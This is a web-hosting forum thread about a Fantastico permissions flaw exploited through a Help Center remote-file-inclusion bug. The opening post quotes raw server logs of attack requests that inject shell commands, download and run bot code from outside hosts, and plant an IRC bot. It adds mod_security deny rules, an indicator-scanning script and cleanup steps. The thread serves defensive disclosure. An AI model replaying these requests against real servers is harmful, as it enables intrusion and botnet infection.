  1. #1
    Member
    Join Date
    Oct 2004
    Location
    New Jersey, USA
    Posts
    160

    Default Fantastico Issue - Improper chmod settings allow exploits to be run - READ ASAP

    Saw files running from /var/netenberg for the 2nd or 3rd time. It seems these dirs have 777 permissions, and people are starting to mass-distribute scripts that take advantage of this security oversight:


    Code:
    root@edge [~]# cd /proc/24106
    root@edge [/proc/24106]# ls -al
    total 0
    dr-x------    3 nobody   nobody          0 Oct 19 00:15 ./
    dr-xr-xr-x  206 root     root            0 Oct 14 12:50 ../
    dr-xr-xr-x    2 nobody   nobody          0 Oct 20 02:10 attr/
    -r--------    1 nobody   nobody          0 Oct 20 02:10 auxv
    -r--r--r--    1 nobody   nobody          0 Oct 20 01:54 cmdline
    lrwxrwxrwx    1 nobody   nobody          0 Oct 20 02:10 cwd -> /var/netenberg/fantastico_de_luxe/master_files/4Images_Gallery/templates/default/media/.www/
    -r--------    1 nobody   nobody          0 Oct 20 01:54 environ
    lrwxrwxrwx    1 nobody   nobody          0 Oct 20 02:00 exe -> /var/netenberg/fantastico_de_luxe/master_files/4Images_Gallery/templates/default/media/.www/httpd*
    dr-x------    2 nobody   nobody          0 Oct 19 00:15 fd/
    -r--------    1 nobody   nobody          0 Oct 20 02:10 ipaddr
    -r--r--r--    1 nobody   nobody          0 Oct 20 02:10 maps
    -rw-------    1 nobody   nobody          0 Oct 20 02:10 mem
    -r--r--r--    1 nobody   nobody          0 Oct 20 02:10 mounts
    -rw-r--r--    1 nobody   nobody          0 Oct 20 02:10 oom_adj
    -r--r--r--    1 nobody   nobody          0 Oct 20 02:10 oom_score
    lrwxrwxrwx    1 nobody   nobody          0 Oct 20 02:10 root -> //
    -r--r--r--    1 nobody   nobody          0 Oct 20 01:54 stat
    -r--r--r--    1 nobody   nobody          0 Oct 20 02:00 statm
    -r--r--r--    1 nobody   nobody          0 Oct 20 01:54 status
    dr-xr-xr-x    3 nobody   nobody          0 Oct 20 02:10 task/
    
    root@edge [/var/netenberg/fantastico_de_luxe/master_files/4Images_Gallery/templates/default]# cd /proc/3222
    root@edge [/proc/3222]# ls -al
    total 0
    dr-x------    3 nobody   nobody          0 Oct 18 18:00 ./
    dr-xr-xr-x  218 root     root            0 Oct 14 12:50 ../
    dr-xr-xr-x    2 nobody   nobody          0 Oct 20 02:11 attr/
    -r--------    1 nobody   nobody          0 Oct 20 02:11 auxv
    -r--r--r--    1 nobody   nobody          0 Oct 20 01:54 cmdline
    lrwxrwxrwx    1 nobody   nobody          0 Oct 20 02:11 cwd -> /var/netenberg/fantastico_de_luxe/master_files/Drupal/files/irclordz/
    -r--------    1 nobody   nobody          0 Oct 20 01:54 environ
    lrwxrwxrwx    1 nobody   nobody          0 Oct 20 02:00 exe -> /var/netenberg/fantastico_de_luxe/master_files/Drupal/files/irclordz/eggdrop-1.6.12*
    dr-x------    2 nobody   nobody          0 Oct 18 18:00 fd/
    -r--------    1 nobody   nobody          0 Oct 20 02:11 ipaddr
    -r--r--r--    1 nobody   nobody          0 Oct 20 02:11 maps
    -rw-------    1 nobody   nobody          0 Oct 20 02:11 mem
    -r--r--r--    1 nobody   nobody          0 Oct 20 02:11 mounts
    -rw-r--r--    1 nobody   nobody          0 Oct 20 02:11 oom_adj
    -r--r--r--    1 nobody   nobody          0 Oct 20 02:11 oom_score
    lrwxrwxrwx    1 nobody   nobody          0 Oct 20 02:11 root -> //
    -r--r--r--    1 nobody   nobody          0 Oct 20 01:54 stat
    -r--r--r--    1 nobody   nobody          0 Oct 20 02:00 statm
    -r--r--r--    1 nobody   nobody          0 Oct 20 01:54 status
    dr-xr-xr-x    3 nobody   nobody          0 Oct 20 02:11 task/
    root@edge [/proc/3222]# cd /var/netenberg/fantastico_de_luxe/

    It appears all of these are exploitable.



    I finally traced this back to the exploitable script being used to mass-distribute it: exploitable Help Center files (also installed by Fantastico).


    Code:
    root@edge [/usr/local/apache/domlogs]# grep "neten" xxxxxxx
    200.158.9.221 - - [19/Oct/2005:00:06:47 -0400] "GET /helpcenter/inc/pipe.php?HCL_path=http://vesgo.50megs.com/cse.gif?&cmd=cd%20/var/netenberg/fantastico_de_luxe/master_files/Drupal/files/irclordz/filesys/;ls%20-la HTTP/1.0" 200 2427 "-" "Opera/8.50 (Windows NT 5.1; U; en)"
    200.158.9.221 - - [19/Oct/2005:00:07:07 -0400] "GET /helpcenter/inc/pipe.php?HCL_path=http://vesgo.50megs.com/cse.gif?&cmd=cd%20/var/netenberg/fantastico_de_luxe/master_files/Drupal/files/irclordz/;ls%20-la HTTP/1.0" 200 5726 "-" "Opera/8.50 (Windows NT 5.1; U; en)"
    200.158.9.221 - - [19/Oct/2005:00:07:30 -0400] "GET /helpcenter/inc/pipe.php?HCL_path=http://vesgo.50megs.com/cse.gif?&cmd=cd%20/var/netenberg/fantastico_de_luxe/master_files/Drupal/files/.var;ls%20-la HTTP/1.0" 200 3494 "-" "Opera/8.50 (Windows NT 5.1; U; en)"
    200.158.9.221 - - [19/Oct/2005:00:09:52 -0400] "GET /helpcenter/inc/pipe.php?HCL_path=http://vesgo.50megs.com/cse.gif?&cmd=cd%20/var/netenberg/fantastico_de_luxe/master_files/4Images_Gallery/templates/default/media/;ls%20-la HTTP/1.0" 200 3399 "-" "Opera/8.50 (Windows NT 5.1; U; en)"
    200.158.9.221 - - [19/Oct/2005:00:10:09 -0400] "GET /helpcenter/inc/pipe.php?HCL_path=http://vesgo.50megs.com/cse.gif?&cmd=cd%20/var/netenberg/fantastico_de_luxe/master_files/4Images_Gallery/templates/default/media/;mkdir%20.www HTTP/1.0" 200 2236 "-" "Opera/8.50 (Windows NT 5.1; U; en)"
    200.158.9.221 - - [19/Oct/2005:00:11:05 -0400] "GET /helpcenter/inc/pipe.php?HCL_path=http://vesgo.50megs.com/cse.gif?&cmd=cd%20/var/netenberg/fantastico_de_luxe/master_files/4Images_Gallery/templates/default/media/.www/;curl%20-O%20http://www.liquidhost.biz/call/.doc/bot.tar HTTP/1.1" 200 2809 "-" "Opera/8.50 (Windows NT 5.1; U; en)"
    200.158.9.221 - - [19/Oct/2005:00:11:36 -0400] "GET /helpcenter/inc/pipe.php?HCL_path=http://vesgo.50megs.com/cse.gif?&cmd=cd%20/var/netenberg/fantastico_de_luxe/master_files/4Images_Gallery/templates/default/media/.www/;tar%20-xf%20bot.tar;rm%20bot.tar HTTP/1.1" 200 2255 "-" "Opera/8.50 (Windows NT 5.1; U; en)"
    200.158.9.221 - - [19/Oct/2005:00:11:47 -0400] "GET /helpcenter/inc/pipe.php?HCL_path=http://vesgo.50megs.com/cse.gif?&cmd=cd%20/var/netenberg/fantastico_de_luxe/master_files/4Images_Gallery/templates/default/media/.www/;ls%20-la HTTP/1.0" 200 3287 "-" "Opera/8.50 (Windows NT 5.1; U; en)"
    200.158.9.221 - - [19/Oct/2005:00:14:27 -0400] "GET /helpcenter/inc/pipe.php?HCL_path=http://vesgo.50megs.com/cse.gif?&cmd=cd%20/var/netenberg/fantastico_de_luxe/master_files/4Images_Gallery/templates/default/media/.www/;curl%20-O%20http://www.anc01.oi.com.br/mh HTTP/1.0" 200 2553 "-" "Opera/8.50 (Windows NT 5.1; U; en)"
    200.158.9.221 - - [19/Oct/2005:00:14:36 -0400] "GET /helpcenter/inc/pipe.php?HCL_path=http://vesgo.50megs.com/cse.gif?&cmd=cd%20/var/netenberg/fantastico_de_luxe/master_files/4Images_Gallery/templates/default/media/.www/;./httpd%20-b%20mh HTTP/1.0" 200 2695 "-" "Opera/8.50 (Windows NT 5.1; U; en)"
    200.158.9.221 - - [19/Oct/2005:00:40:43 -0400] "GET /helpcenter/inc/pipe.php?HCL_path=http://vesgo.50megs.com/cse.gif?&cmd=cd%20/var/netenberg/fantastico_de_luxe/master_files/4Images_Gallery/templates/default/media/.www/;ls%20-la HTTP/1.0" 200 3532 "-" "Opera/8.50 (Windows NT 5.1; U; en)"
    200.158.9.221 - - [19/Oct/2005:00:40:49 -0400] "GET /helpcenter/inc/pipe.php?HCL_path=http://vesgo.50megs.com/cse.gif?&cmd=cd%20/var/netenberg/fantastico_de_luxe/master_files/4Images_Gallery/templates/default/media/.www/;mkdir%20.ani HTTP/1.0" 200 2236 "-" "Opera/8.50 (Windows NT 5.1; U; en)"
    I would suggest, if you have not yet, that you install mod_security; this can now be done from WHM, or you can visit http://www.nuclearelephant.com/projects/mod_evasive/

    This is ESSENTIAL for any server. You can find a ruleset at www.gotroot.com, or email me at kris@hostmerit.com for the ruleset I've developed over the last year or so.

    Below are the rulesets I've developed to keep our servers secure from this security oversight. APPLY THESE MOD SECURITY RULES IMMEDIATELY.

    SecFilter "arta\.zip"
    SecFilter "cmd=cd\x20/var"
    SecFilter "master_files"
    SecFilter "HCL_path"
    SecFilter "clamav-partial"
    SecFilter "vi\.recover"
    SecFilter "netenberg"
    SecFilter "pipe\.php"
    SecFilter "cse\.gif"
    SecFilter "psybnc"
    SecFilter "fantastico_de_luxe"

    Also,

    apf -d vesgo.50megs.com
    apf -d 64.136.24.0/24

    I have no possible need to have packets incoming from insecure webspace, hence I've blocked the c-block it came from.


    One more thing, chances are you're already infected, multiple times.

    I would kill the /var/netenberg directory and do a fresh install.
    You can also check by running cd /var/netenberg and then find ./ -user nobody, then removing any scripts owned / modified by nobody, as all real scripts have root permissions.

    Right after, do:
    Code:
    chattr +i -R /var/netenberg/

    If anyone tried installing these scripts when they were hacked / had rogue files inside them (which is a very, very good chance), you just helped your client auto-install an exploit script...

    It appears Netenberg has known about this, yet is slacking on fixing it.

    Judging by the fact that you can now run files / compile / etc., if any people have unpatched kernels there is a possibility of being rooted from this... I think it was necessary to disclose how to fix / patch this. No hate against Netenberg or Fantastico, but you must keep your server secure. I suggest you apply the above SecFilter rules to your mod_security configuration ASAP.

    -Kris

    http://www.hostmerit.com

    kris@hostmerit.com
    -Kris
    HostMerit
    'Web Hosting on Your Terms'
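    As an added example, not part of Kris's post or the Fantastico project, the SecFilter indicators above turned into a retroactive check over existing domlogs, so a server that was already hit before the rules went in still gets found; the requests are URL-decoded first so "%20/var" and " /var" both match, and the sample log lines and addresses are constructed.

```python
import re
from urllib.parse import unquote

# Apache combined-log line, the same layout as the domlogs in the post.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Detection patterns mirroring the SecFilter rules in the post, applied
# to the URL-decoded request so encoding tricks do not hide a match.
INDICATORS = {
    "hcl_path":   re.compile(r"HCL_path=", re.I),
    "pipe_php":   re.compile(r"/helpcenter/inc/pipe\.php", re.I),
    "cmd_cd_var": re.compile(r"cmd=cd /var", re.I),
    "netenberg":  re.compile(r"netenberg|fantastico_de_luxe|master_files", re.I),
    "remote_inc": re.compile(r"=https?://", re.I),  # remote include attempt
}

def parse_line(line):
    """Return the fields of one combined-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["decoded_path"] = unquote(rec["path"])
    return rec

def scan(lines):
    """Return (ip, timestamp, [indicator names]) for each suspicious line."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        names = [n for n, rx in INDICATORS.items() if rx.search(rec["decoded_path"])]
        if names:
            hits.append((rec["ip"], rec["ts"], names))
    return hits

# Constructed sample lines (placeholder addresses, not from any real server).
SAMPLE = [
    '203.0.113.5 - - [19/Oct/2005:00:06:47 -0400] "GET /helpcenter/inc/pipe.php?HCL_path=http://attacker.example/x.gif?&cmd=cd%20/var/netenberg/fantastico_de_luxe/master_files/;ls%20-la HTTP/1.0" 200 2427 "-" "Opera/8.50"',
    '198.51.100.7 - - [19/Oct/2005:00:07:00 -0400] "GET /helpcenter/index.php?topic=12 HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    for ip, ts, names in scan(SAMPLE):
        print(f"{ts} {ip} -> {', '.join(names)}")
```

    Run it as `grep -h helpcenter /usr/local/apache/domlogs/* | python3 scan.py` style input by swapping SAMPLE for sys.stdin; any hit means the server needs the cleanup steps from the post, not just the filters.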

  2. #2
    Member
    Join Date
    Feb 2004
    Posts
    469

    Thumbs up

    Thanks for the heads up on this one. You have been very thorough in your efforts at securing these issues.
    My servers all checked out just fine and so I have instigated your recommendations and hopefully should be secure once again, till the next hole is discovered.
    The link to Got Root site has one of the best collection of modsec signature files I have ever seen. I bookmarked for a closer look later.
    Well done!
    Last edited by Izzee; 10-20-2005 at 08:08 AM.

  3. #3
    Member DigiCrime's Avatar
    Join Date
    Nov 2002
    Posts
    388

    Default

    Have you emailed Kosmo or left a message on their board about it?

  4. #4
    Registered User
    Join Date
    Jan 2004
    Location
    Atlanta Ga!
    Posts
    43

    Default

    Yeah... he did.

    It seems that they already knew about the issue:
    http://www.netenberg.com/forum/viewtopic.php?t=3399

  5. #5
    Member
    Join Date
    Oct 2004
    Location
    New Jersey, USA
    Posts
    160

    Default

    They've known for a few weeks, but haven't done anything

    They asked for 'a few more releases to fix it'

    Which I didn't deem fit

    If anyone would like MY ruleset

    It is at http://www.hostmerit.com/modsec.user.conf

    This is assuming you used CPanel / WHM Addon Modules to install Mod_sec

    This would go in /usr/local/apache/conf/
    -Kris
    HostMerit
    'Web Hosting on Your Terms'

  6. #6
    BANNED
    Join Date
    Jul 2005
    Posts
    537

    Default

    Hi thanks for that;

    Just a quick perusal and I notice these two rules duplicated.

    SecFilterSelective THE_REQUEST "&highlight=%2527%252E "
    SecFilterSelective THE_REQUEST "changedir=%2Ftmp%2F.php "

  7. #7
    cPanel Partner NOC cPanel Partner NOC Badge
    Join Date
    Oct 2003
    Posts
    1,931

    Default

    HostMerit, great post

    and great link to www.gotroot.com
    I implemented the ruleset from there and found that the blacklist.conf & blacklist2.conf were a little too restrictive
    Lowest Host/Empire Technology LLC
    Affordable hosting solutions http://empire-hosting.net
    List Your hosting site FREE in http://hostgeneration.com

  8. #8
    Member
    Join Date
    Feb 2004
    Posts
    469

    Question

    From a very recent post on the Netenberg forums by Kosmo:
    Fantastico will do following:
    - remove all masterfiles (in order to delete all infections but this can only be done if the masterfiles are not protected)
    - uncompress the tarballs to masterfiles
    - protect the masterfiles (chattr/chflags)
    Virtuozzo powered VPS disallows the use of the chattr flag.
    How will these masterfiles on a Virt. VPS be protected I wonder?

  9. #9
    Member
    Join Date
    Apr 2003
    Posts
    94

    Default

    Will disabling or removing helpcenter resolve the issue?
    I found mine in Gallery and Zen Cart.

  10. #10
    Member
    Join Date
    Oct 2004
    Location
    New Jersey, USA
    Posts
    160

    Default

    Any script can be exploited or installed into; it's the 777 permissions set by Fantastico on it.

    Using my new rules + other rules will block this rubbish. My ruleset has been compiled by me over the last 6+ months, with some default, some from GotRoot, and some I've found myself to work well since I've implemented it. My ruleset should not be restrictive, as it has special rules from GotRoot also to allow programs that call commands in a vulnerable way to pass through, without disabling the security module.

    I've found you can't load nearly all of GotRoot's scripts, but a lot are good for a cPanel environment. I also used to work security for a rather large web hosting company, so I know how these people think.
    -Kris
    HostMerit
    'Web Hosting on Your Terms'

  11. #11
    Super Moderator This forum account has been confirmed by cPanel staff to represent a vendor. chirpy's Avatar
    Join Date
    Jun 2002
    Location
    Go on, have a guess
    Posts
    13,495

    Default

    Although not a cPanel issue, I've made this sticky for now until netenberg release a fix.
    Jonathan Michaelson

    Need your cPanel servers secured and tuned?
    cPanel Server Configuration, Security, Recovery and Antivirus/AntiSpam Services
    Developers of the most effective (and free) Firewall & Security Solution for cPanel Servers - csf
    http://www.configserver.com

  12. #12
    BANNED
    Join Date
    Jul 2005
    Posts
    537

    Default

    Quote Originally Posted by Izzee
    From a very recent post on the Netenberg forums by Kosmo: Virtuozzo powered VPS disallows the use of the chattr flag.
    How will these masterfiles on a Virt. VPS be protected I wonder?

    Well, I had to use HostMerit's ruleset as I was having Apache restart issues with the Apache 1.x rulesets. The rulesets I was having an issue with are

    rules.conf
    blacklist.conf

    Apache 1.x does not like something in those rulesets and I didn't bother checking any further.

  13. #13
    cPanel Verified Vendor This forum account has been confirmed by cPanel staff to represent a vendor.
    Join Date
    Aug 2001
    Location
    All over Europe
    Posts
    407

    Default

    to all:

    Please update to Fantastico 2.10.0 r15 asap.

    kosmo
    http://netenberg.com/
    AccountLab Plus Affordable professional webhosting billing
    Click Be! Building websites as easy as it click be
    Fantastico De Luxe - Install your favourite scripts at a mouse click
    Universina - The CPanel skin with Heart and Soul

  14. #14
    Member
    Join Date
    Apr 2003
    Location
    Auckland, New Zealand
    Posts
    172

    Default

    Thank You Kosmo

  15. #15
    Member
    Join Date
    Jan 2005
    Location
    London, UK
    Posts
    187

    Default

    Quote Originally Posted by Izzee
    From a very recent post on the Netenberg forums by Kosmo: Virtuozzo powered VPS disallows the use of the chattr flag.
    How will these masterfiles on a Virt. VPS be protected I wonder?
    Any news on this?
    Can I use WHM to update Fantastico on a Virtuozzo VPS server?

    Thanks,

    - Vince
